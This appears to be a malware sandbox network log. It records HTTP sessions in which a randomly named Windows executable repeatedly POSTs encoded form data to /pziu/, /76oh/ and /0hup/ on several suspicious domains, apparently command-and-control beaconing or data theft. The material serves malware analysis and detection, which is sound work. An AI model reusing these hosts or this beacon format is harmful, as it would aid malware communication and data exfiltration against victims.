                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.65120985.159.66.93805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:48.836947918 CEST843OUTPOST /pziu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kontorpaneli.xyz
                                        Origin: http://www.kontorpaneli.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.kontorpaneli.xyz/pziu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 4a 61 57 4b 6a 71 62 54 73 55 7a 56 4d 49 32 66 63 35 63 35 4f 69 39 31 33 45 46 6f 76 69 4a 57 58 47 43 6c 55 4a 2f 47 4e 50 6d 4a 55 35 52 2f 7a 74 48 6c 49 66 6f 63 6e 68 42 56 47 46 2f 59 36 2b 67 53 63 32 6b 75 6d 52 65 78 42 51 77 72 70 38 6a 32 6f 75 5a 38 6e 37 2f 6c 54 77 41 4c 73 45 73 50 6c 37 6b 2f 32 53 7a 74 39 6c 48 55 48 47 32 4a 6e 53 36 6f 30 70 61 51 74 37 4b 6f 52 49 34 76 35 4c 31 35 59 47 36 72 68 47 36 62 56 72 58 37 78 2b 64 73 36 51 64 71 30 63 77 31 55 77 50 6a 64 6a 52 4b 42 62 47 4f 4d 69 47 6c 38 6b 66 44 31 47 52 4e 33 4e 59 59 63 72 7a 38 65 74 53 43 4d 7a 74 45 64 44 34 67
                                        Data Ascii: mvjDMBx8=JaWKjqbTsUzVMI2fc5c5Oi913EFoviJWXGClUJ/GNPmJU5R/ztHlIfocnhBVGF/Y6+gSc2kumRexBQwrp8j2ouZ8n7/lTwALsEsPl7k/2Szt9lHUHG2JnS6o0paQt7KoRI4v5L15YG6rhG6bVrX7x+ds6Qdq0cw1UwPjdjRKBbGOMiGl8kfD1GRN3NYYcrz8etSCMztEdD4g
                                        Aug 27, 2024 08:42:49.519751072 CEST225INHTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Tue, 27 Aug 2024 06:42:49 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 19
                                        X-Rate-Limit-Reset: 2024-08-27T06:42:54.4080621Z


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.65121085.159.66.93805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:51.377645969 CEST867OUTPOST /pziu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kontorpaneli.xyz
                                        Origin: http://www.kontorpaneli.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.kontorpaneli.xyz/pziu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 4a 61 57 4b 6a 71 62 54 73 55 7a 56 50 6f 47 66 61 61 45 35 49 43 39 30 37 6b 46 6f 67 43 4a 53 58 47 2b 6c 55 4e 6e 57 4d 38 53 4a 55 63 74 2f 79 73 48 6c 50 66 6f 63 67 52 42 4d 4c 6c 2f 70 36 2b 6c 76 63 7a 45 75 6d 52 4b 78 42 52 41 72 70 76 37 31 70 2b 5a 2b 2b 72 2f 6e 58 77 41 4c 73 45 73 50 6c 37 78 59 32 53 72 74 38 56 33 55 45 69 71 4b 68 69 36 72 7a 70 61 51 67 62 4c 76 52 49 34 4e 35 4f 56 54 59 45 79 72 68 48 4b 62 45 65 72 6b 37 2b 64 6d 33 77 63 59 39 74 74 4e 4d 77 36 67 63 41 35 71 5a 4a 44 70 45 30 48 2f 67 58 66 67 6e 57 78 50 33 50 41 71 63 4c 7a 57 63 74 71 43 65 6b 68 6a 53 33 64 44 64 71 50 63 5a 69 46 6d 2f 4e 37 30 6b 71 4c 4c 46 71 46 30 5a 51 3d 3d
                                        Data Ascii: mvjDMBx8=JaWKjqbTsUzVPoGfaaE5IC907kFogCJSXG+lUNnWM8SJUct/ysHlPfocgRBMLl/p6+lvczEumRKxBRArpv71p+Z++r/nXwALsEsPl7xY2Srt8V3UEiqKhi6rzpaQgbLvRI4N5OVTYEyrhHKbEerk7+dm3wcY9ttNMw6gcA5qZJDpE0H/gXfgnWxP3PAqcLzWctqCekhjS3dDdqPcZiFm/N70kqLLFqF0ZQ==
                                        Aug 27, 2024 08:42:52.052587986 CEST225INHTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Tue, 27 Aug 2024 06:42:51 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 18
                                        X-Rate-Limit-Reset: 2024-08-27T06:42:54.4080621Z


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.65121185.159.66.93805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:53.931512117 CEST1880OUTPOST /pziu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kontorpaneli.xyz
                                        Origin: http://www.kontorpaneli.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.kontorpaneli.xyz/pziu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 4a 61 57 4b 6a 71 62 54 73 55 7a 56 50 6f 47 66 61 61 45 35 49 43 39 30 37 6b 46 6f 67 43 4a 53 58 47 2b 6c 55 4e 6e 57 4d 39 71 4a 55 4b 5a 2f 7a 50 76 6c 4f 66 6f 63 76 42 42 52 4c 6c 2f 4f 36 34 4e 6a 63 7a 5a 54 6d 54 79 78 42 79 49 72 39 4f 37 31 6a 2b 5a 2b 32 4c 2f 6b 54 77 41 65 73 45 63 4c 6c 37 68 59 32 53 72 74 38 57 76 55 53 47 32 4b 36 69 36 6f 30 70 62 43 74 37 4c 4c 52 4d 56 79 35 4f 5a 70 59 55 53 72 68 6e 61 62 58 4d 44 6b 7a 2b 64 6f 77 77 63 41 39 74 68 53 4d 77 57 43 63 42 4e 51 5a 4a 48 70 58 43 65 49 39 31 4c 55 31 31 64 76 73 50 6f 62 51 75 66 38 55 2b 75 70 66 45 56 76 59 30 31 76 51 4d 4f 66 62 30 52 71 70 50 54 6d 74 4e 61 75 4d 72 49 51 44 4f 36 72 2b 66 68 32 31 50 6b 53 74 57 64 6b 58 75 4d 46 67 58 73 4a 72 37 62 53 50 38 69 34 6a 79 33 6a 47 6f 73 4e 79 75 43 4d 33 50 46 7a 51 71 52 35 4d 55 73 2b 4c 51 4e 61 70 70 77 58 62 33 43 47 71 42 37 75 38 49 72 72 2f 42 76 58 62 6a 39 5a 33 4f 46 72 41 6b 6e 42 4b 56 51 50 58 62 70 63 43 66 33 6f 56 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=JaWKjqbTsUzVPoGfaaE5IC907kFogCJSXG+lUNnWM9qJUKZ/zPvlOfocvBBRLl/O64NjczZTmTyxByIr9O71j+Z+2L/kTwAesEcLl7hY2Srt8WvUSG2K6i6o0pbCt7LLRMVy5OZpYUSrhnabXMDkz+dowwcA9thSMwWCcBNQZJHpXCeI91LU11dvsPobQuf8U+upfEVvY01vQMOfb0RqpPTmtNauMrIQDO6r+fh21PkStWdkXuMFgXsJr7bSP8i4jy3jGosNyuCM3PFzQqR5MUs+LQNappwXb3CGqB7u8Irr/BvXbj9Z3OFrAknBKVQPXbpcCf3oVPPS5uk7FOiJCgD+qyCzFhRxk5rappv9e/Haq680wKkDt8RUkzbhV/sxON9E0JDskIDQXbPKH2RRd1KOAauhFAceYYiiayqS72wpJiayJQz2C8Pw9CwIDLDqCZ1JL1TwCIDDThhZJp5NKZ3Mw359kSznJqPO64+nSnFms5z6xiNw970/L/MOVdGrJLnvhOpLQpgo9FYa/CBo7XG7OAzPZakNTQRbX3GIR5jkn4VPunf/uIhPgIFXYsbDNLdofIp/gQuYKXCvTB/0coLdqoaKrSBy+Km/blYazgEMEWCya7n5Ow5/pNDJGI9NfMa1EXSD5I3P81/n0nfrZP4B0kirqH8KcRKU7fta7HnV27331PUEg8Zw25mmN6d9K/Q/dFHrj6kBTyxG/vlmqLQ6Z903N8ynmBQlILASeyo/Ph/6xakvH1unXZr4cOcuzWZTAiQ0bqdAj+T0OWw0xOk2BspL//jWzvUJAWEBMp3meUVyCSehxsxpAxQgHjaol/4zmXHyLdxRRGgvMRE5I6//daFHSWfpM4Y/zbpQI5pVoD6XHmLvao8wxGW1kkh8K3rmDTuShlY8YvWyupl2jfm9H8lRT5d2x3i+JntbSRg0ux9quOpXUozmJC+BdGZiHwRGhKYmYSNTrD3iLSsA8rqR2pilSHbZcEj10mLOkCh [TRUNCATED]
                                        Aug 27, 2024 08:42:54.625991106 CEST225INHTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Tue, 27 Aug 2024 06:42:54 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 19
                                        X-Rate-Limit-Reset: 2024-08-27T06:42:59.5198668Z


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.65121285.159.66.93805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:56.469331980 CEST587OUTGET /pziu/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=EY+qgcjcqEvJaY+ALfwoPip36wdjh3xsdSy6XMjMfPv/Ir5Xz5+nGIw7jjJwblfp8IgSbQk1nTysBGMjrt/hxs8d+JiTcx1VzVYwtbha6lbR616oEW2vuE+H/qKkyJ7RSqcP4eo= HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kontorpaneli.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:57.182338953 CEST225INHTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Tue, 27 Aug 2024 06:42:57 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 19
                                        X-Rate-Limit-Reset: 2024-08-27T06:43:02.0663113Z


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.6512133.33.130.190805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:02.228945017 CEST837OUTPOST /76oh/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.globyglen.info
                                        Origin: http://www.globyglen.info
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.globyglen.info/76oh/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 57 6d 4b 45 4d 79 53 42 31 75 5a 79 39 32 55 64 41 74 65 73 5a 2b 33 52 51 6a 2f 71 53 6a 74 46 4a 6f 77 73 61 65 4e 41 61 78 61 55 34 35 4a 4b 6d 4f 49 30 2f 68 53 64 56 7a 46 5a 67 42 79 36 2f 6a 4a 48 63 50 50 4d 76 37 31 59 38 6c 53 72 79 45 37 6b 6c 6d 4e 76 78 51 4d 4a 50 4a 57 39 36 57 73 76 6b 4a 49 39 67 68 46 46 49 32 69 63 51 49 47 6c 35 56 6c 65 33 73 54 50 73 58 6d 74 71 37 4f 4a 46 77 6c 49 67 4c 62 42 4d 6f 52 4a 57 56 32 34 53 47 72 31 65 74 2f 4e 72 50 4b 70 43 75 76 36 42 45 68 52 32 31 35 64 56 52 30 45 4d 67 32 58 31 43 77 58 77 66 66 68 72 50 66 45 43 36 2f 6c 36 36 59 61 39 34 4f 4d
                                        Data Ascii: mvjDMBx8=WmKEMySB1uZy92UdAtesZ+3RQj/qSjtFJowsaeNAaxaU45JKmOI0/hSdVzFZgBy6/jJHcPPMv71Y8lSryE7klmNvxQMJPJW96WsvkJI9ghFFI2icQIGl5Vle3sTPsXmtq7OJFwlIgLbBMoRJWV24SGr1et/NrPKpCuv6BEhR215dVR0EMg2X1CwXwffhrPfEC6/l66Ya94OM


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.6512143.33.130.190805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:04.776777029 CEST861OUTPOST /76oh/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.globyglen.info
                                        Origin: http://www.globyglen.info
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.globyglen.info/76oh/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 57 6d 4b 45 4d 79 53 42 31 75 5a 79 39 58 6b 64 54 63 65 73 52 2b 33 53 63 44 2f 71 63 44 74 4a 4a 6f 38 73 61 66 4a 51 61 45 71 55 34 59 35 4b 6e 4d 73 30 34 68 53 64 4e 6a 46 59 2b 78 7a 34 2f 6a 56 50 63 4b 33 4d 76 37 68 59 38 6e 61 72 79 33 6a 6a 30 6d 4e 70 70 67 4d 4c 43 70 57 39 36 57 73 76 6b 4a 73 48 67 69 31 46 49 6c 4b 63 58 5a 47 69 36 56 6c 64 67 63 54 50 6f 58 6d 70 71 37 50 35 46 31 46 75 67 4a 6a 42 4d 71 4a 4a 57 41 61 33 63 32 72 33 61 74 2b 71 75 74 66 66 4d 63 6d 4b 41 47 39 49 71 69 41 32 51 6e 31 65 51 54 32 30 6e 53 51 56 77 64 48 54 72 76 66 75 41 36 48 6c 6f 74 55 39 79 4d 72 76 64 77 7a 65 4e 69 4f 42 62 46 2f 4f 67 52 71 64 48 2b 66 67 4d 41 3d 3d
                                        Data Ascii: mvjDMBx8=WmKEMySB1uZy9XkdTcesR+3ScD/qcDtJJo8safJQaEqU4Y5KnMs04hSdNjFY+xz4/jVPcK3Mv7hY8nary3jj0mNppgMLCpW96WsvkJsHgi1FIlKcXZGi6VldgcTPoXmpq7P5F1FugJjBMqJJWAa3c2r3at+qutffMcmKAG9IqiA2Qn1eQT20nSQVwdHTrvfuA6HlotU9yMrvdwzeNiOBbF/OgRqdH+fgMA==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.6512153.33.130.190805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:07.316279888 CEST1874OUTPOST /76oh/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.globyglen.info
                                        Origin: http://www.globyglen.info
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.globyglen.info/76oh/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 57 6d 4b 45 4d 79 53 42 31 75 5a 79 39 58 6b 64 54 63 65 73 52 2b 33 53 63 44 2f 71 63 44 74 4a 4a 6f 38 73 61 66 4a 51 61 46 2b 55 34 72 68 4b 6d 73 51 30 35 68 53 64 42 44 46 6a 2b 78 79 67 2f 6a 4e 31 63 4b 7a 6d 76 39 74 59 75 53 4f 72 30 47 6a 6a 74 32 4e 70 31 51 4d 49 50 4a 57 53 36 57 38 72 6b 4a 38 48 67 69 31 46 49 67 4f 63 42 59 47 69 33 31 6c 65 33 73 53 4f 73 58 6e 2b 71 37 58 50 46 31 42 59 67 59 44 42 4d 4b 5a 4a 58 79 69 33 65 57 72 35 55 4e 2b 79 75 74 44 4d 4d 59 2f 37 41 48 4a 32 71 6c 77 32 53 32 4d 38 48 7a 37 73 39 79 49 6e 6b 38 50 6f 6a 59 48 70 4e 4d 37 6c 6f 63 46 4b 74 74 50 7a 57 41 76 59 42 77 4c 34 5a 6a 66 33 6d 33 4c 75 48 36 4f 66 58 63 4c 6d 6a 2f 79 66 4a 42 79 4b 50 7a 70 31 36 64 31 62 51 78 6b 54 5a 2f 72 58 77 6a 52 4a 53 30 54 4e 41 30 76 2b 4b 36 42 70 64 30 4f 43 4a 54 73 35 6a 63 33 2b 5a 36 31 63 59 30 67 63 4e 53 73 47 4c 72 79 53 65 46 54 75 47 66 5a 55 53 47 4e 52 74 49 39 50 61 63 37 33 64 75 71 64 65 45 49 32 73 38 75 34 69 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=WmKEMySB1uZy9XkdTcesR+3ScD/qcDtJJo8safJQaF+U4rhKmsQ05hSdBDFj+xyg/jN1cKzmv9tYuSOr0Gjjt2Np1QMIPJWS6W8rkJ8Hgi1FIgOcBYGi31le3sSOsXn+q7XPF1BYgYDBMKZJXyi3eWr5UN+yutDMMY/7AHJ2qlw2S2M8Hz7s9yInk8PojYHpNM7locFKttPzWAvYBwL4Zjf3m3LuH6OfXcLmj/yfJByKPzp16d1bQxkTZ/rXwjRJS0TNA0v+K6Bpd0OCJTs5jc3+Z61cY0gcNSsGLrySeFTuGfZUSGNRtI9Pac73duqdeEI2s8u4iKbpO1rh/XtDH2q1fu3ovQcbkexbhYJ+N1VCdP9ZukvdfInuasdPT97n7I6iZzZWwhGuDylYAFtyiA++pSGDSRszCqoCWryJ1LWvhYYqDzlSoFlEf1K9wXTCgOfjKl0cJuDtcP7pRd8IHnIq9cVX38+QgCEJMSMtO0rgon1LGRbgT+ok5RUOq1zniKLgAv5jzsUSCx6m6+XdwabukFoklMkBzGqsIJnQ+wYRefLCOPTAZLGd1RfJM4UwZbupYFazfWdPzktwaDBlM41bFR2rWQ4pCSgza0aXv6mZflF8T7eRzyK+uJuUV8JDGtY/6iSH3VZelVT1edosOT8s53hAbwOOp5EZncaOkSGVt++xix6/d6sAWRSWsbcTvw1TkWnFC7FNgkLYE1M0viz/Ckin1MDdy8E22npRcxCf0Cr/YdokD1QWpYCFTqnjor5NOiU+L3D2IR7vfceTW+CUwBm/D1jBxS8XuO7vFSX8hXAYDDu1zm/5LNMmf4/y7l6IGQMBDWnn0DF8oikTHaPfrK67ZISCt9/2wN+qrhxSqKoz3b/28FHgt5x+u+uQzQ0RHv3USYxoWFtIaL20P5vRjZ1SqrlBn24hTBkPm8Nqfte0CmDj5b/p03ZMmE/ZHXf3C/VW+JPcw6Bd7jFFTz9Rv/Ksuind8bRdRJZuAot [TRUNCATED]


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.6512173.33.130.190805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:09.860126019 CEST585OUTGET /76oh/?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.globyglen.info
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:11.243931055 CEST420INHTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Tue, 27 Aug 2024 06:43:11 GMT
                                        Content-Type: text/html
                                        Content-Length: 280
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 76 6a 44 4d 42 78 38 3d 62 6b 69 6b 50 46 4f 30 79 2b 64 5a 38 46 4a 56 41 5a 43 46 63 38 53 4c 53 6a 6e 53 64 52 4a 47 4a 4d 34 36 66 74 46 58 4c 51 4f 62 38 59 5a 43 6a 61 4a 77 78 32 71 44 48 6a 42 57 35 79 32 70 7a 79 70 70 65 63 6a 73 68 49 4e 36 6a 69 57 42 6f 46 6e 46 30 6d 49 62 77 43 52 34 4c 4d 72 71 6b 30 51 56 35 70 6c 42 6c 6e 31 64 58 33 47 33 58 62 4f 68 36 6a 56 42 77 50 61 34 32 79 4f 43 73 4b 2f 70 4a 51 51 3d 26 41 54 3d 52 72 6a 44 6a 34 5a 38 35 6a 59 50 6c 48 47 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG0"}</script></head></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.651218194.195.220.41805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:16.415420055 CEST840OUTPOST /0hup/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.techcables.shop
                                        Origin: http://www.techcables.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.techcables.shop/0hup/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 51 47 4a 77 32 67 41 47 32 62 6e 30 33 70 2f 6f 69 4e 79 6d 57 54 46 76 65 75 6d 74 49 50 32 69 56 36 4e 66 73 48 35 5a 5a 63 41 79 6d 7a 39 74 57 64 4d 55 39 52 47 69 31 56 50 6b 4b 6c 6e 6d 63 52 38 63 30 49 44 54 68 64 6f 56 50 2f 30 65 61 69 6e 37 70 6c 34 48 56 65 54 33 69 51 42 57 6d 59 59 31 52 4d 77 31 2b 63 62 67 35 4a 52 62 6d 55 35 7a 66 39 59 78 39 68 38 2b 68 73 59 6a 71 30 6d 66 48 32 58 31 39 68 78 66 51 47 4d 54 4e 59 51 66 58 41 79 31 4b 64 58 52 79 72 6b 65 70 4e 47 45 4f 6b 69 64 62 61 4e 58 74 47 76 32 59 2f 71 6b 38 41 45 78 4f 71 52 73 39 4f 39 6e 50 2f 58 68 50 45 49 5a 33 68 4c 61
                                        Data Ascii: mvjDMBx8=QGJw2gAG2bn03p/oiNymWTFveumtIP2iV6NfsH5ZZcAymz9tWdMU9RGi1VPkKlnmcR8c0IDThdoVP/0eain7pl4HVeT3iQBWmYY1RMw1+cbg5JRbmU5zf9Yx9h8+hsYjq0mfH2X19hxfQGMTNYQfXAy1KdXRyrkepNGEOkidbaNXtGv2Y/qk8AExOqRs9O9nP/XhPEIZ3hLa
                                        Aug 27, 2024 08:43:16.912897110 CEST866INHTTP/1.1 200 OK
                                        Server: openresty/1.13.6.1
                                        Date: Tue, 27 Aug 2024 06:43:16 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
